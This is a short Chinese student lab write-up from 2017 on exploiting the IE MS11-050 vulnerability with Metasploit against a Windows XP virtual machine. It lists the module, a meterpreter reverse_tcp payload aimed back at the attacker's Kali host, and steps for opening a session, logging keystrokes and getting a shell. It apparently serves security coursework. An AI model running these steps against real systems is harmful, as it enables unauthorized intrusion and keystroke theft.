MS11-050安全漏洞

IE浏览器渗透攻击——MS11050安全漏洞

实验前准备

1、两台虚拟机,其中一台为kali,一台为windows xp sp3(包含IE7)。

2、设置虚拟机网络为NAT模式,保证两台虚拟机可以相互间ping通(关闭靶机防火墙)。

实验步骤:

1、在kali终端中开启msfconsole。

2、输入命令use windows/browser/ms11_050_mshtml_cobjectelement,进入该漏洞模块。

3、输入info查看信息:

对应的targets:

4、设置对应的载荷set payload windows/meterpreter/reverse_tcp

5、show options查看需要设置的相关信息:

6、设置相关信息

set LHOST ‘kali Ip’

set LPORT  XXXX
 
set URIPATH XXX

7、exploit,如下图所示,有靶机需要访问的ip地址:

8、在靶机IE上输入网址,并在靶机上查看信息。

  • 靶机端IE:

  • kali中显示一个session 1已经创建:

9、输入命令sessions -i 1,开始连接

9、已经攻击成功了,开始按键抓取

  • 或者获取shell

posted @ 2017-04-09 20:31  20145204张亚军  阅读(1930)  评论(0编辑  收藏  举报